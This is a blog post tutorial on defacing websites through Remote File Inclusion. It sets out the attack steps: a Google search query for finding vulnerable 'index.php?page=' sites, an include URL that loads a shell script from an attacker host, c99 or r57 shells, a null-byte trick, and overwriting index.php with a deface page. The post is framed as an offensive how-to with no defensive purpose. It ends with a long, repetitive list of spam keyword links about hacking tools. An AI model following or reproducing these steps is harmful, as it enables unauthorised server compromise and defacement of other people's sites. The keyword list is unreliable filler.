HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Posted by KP-3မိသားစု |

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.

More information


  1. Pentest Tools Url Fuzzer
  2. Easy Hack Tools
  3. Hacking Tools For Windows
  4. Hacker Tools Linux
  5. Hack Tools For Pc
  6. World No 1 Hacker Software
  7. Hacker Tools Github
  8. Hacker Tools 2019
  9. Growth Hacker Tools
  10. Best Hacking Tools 2020
  11. Hacker Search Tools
  12. Hacking Tools For Windows
  13. Best Hacking Tools 2019
  14. Pentest Reporting Tools
  15. Hack Tool Apk No Root
  16. Pentest Tools For Windows
  17. Hacking Tools For Kali Linux
  18. Pentest Tools Alternative
  19. Hacking Apps
  20. What Is Hacking Tools
  21. Hack And Tools
  22. Hackers Toolbox
  23. Hack Tool Apk No Root
  24. Top Pentest Tools
  25. Hacking Tools Windows
  26. Hacking Tools Download
  27. Pentest Tools Url Fuzzer
  28. Hack Tools Github
  29. Hacker Tools For Ios
  30. How To Install Pentest Tools In Ubuntu
  31. Hacking Tools For Pc
  32. Beginner Hacker Tools
  33. Pentest Tools Online
  34. Pentest Tools Framework
  35. Pentest Tools Port Scanner
  36. Hacking Tools Pc
  37. Hacking Tools Free Download
  38. Hacker Tools Linux
  39. How To Hack
  40. What Are Hacking Tools
  41. How To Make Hacking Tools
  42. Hacking Tools Github
  43. Hack Apps
  44. What Are Hacking Tools
  45. New Hack Tools
  46. Pentest Tools Android
  47. Pentest Tools For Android
  48. Pentest Tools Framework
  49. Termux Hacking Tools 2019
  50. Hacking Tools Free Download
  51. Hacker Tools
  52. Hacker Tools For Mac
  53. Ethical Hacker Tools
  54. Hacking Tools Mac
  55. Pentest Tools Port Scanner
  56. Pentest Tools Tcp Port Scanner
  57. Hacker Tools Windows
  58. Pentest Tools Tcp Port Scanner
  59. Hack Tools Mac
  60. Nsa Hack Tools
  61. Pentest Tools Kali Linux
  62. Hack Tools
  63. Hacking Tools For Windows Free Download
  64. Hacking Tools For Games
  65. Hacking Tools Windows
  66. Hacks And Tools
  67. Best Hacking Tools 2020
  68. Tools For Hacker
  69. Pentest Tools Online
  70. Tools For Hacker
  71. Hacker Search Tools
  72. Hacking Tools For Windows 7
  73. Hacker Tools For Ios
  74. Easy Hack Tools
  75. Underground Hacker Sites
  76. Best Pentesting Tools 2018
  77. Hacking Tools Name
  78. Hak5 Tools
  79. Hack Tools
  80. Best Pentesting Tools 2018
  81. Hacker Tools Github
  82. Install Pentest Tools Ubuntu
  83. Hack Tools Mac
  84. Tools For Hacker
  85. Hacker Tools List
  86. Hacker Tools 2020
  87. Black Hat Hacker Tools
  88. Pentest Tools
  89. Nsa Hack Tools Download
  90. Pentest Tools Tcp Port Scanner
  91. Usb Pentest Tools
  92. Pentest Tools Github
  93. Hacking Tools Github
  94. Pentest Tools Tcp Port Scanner
  95. Install Pentest Tools Ubuntu
  96. Pentest Tools Website Vulnerability
  97. How To Install Pentest Tools In Ubuntu
  98. Pentest Tools For Android
  99. Nsa Hack Tools Download
  100. Hacking Tools 2019
  101. Pentest Tools Port Scanner
  102. Hack Tools 2019
  103. Hack Tools For Windows



Related Post:

0 comments:

Post a Comment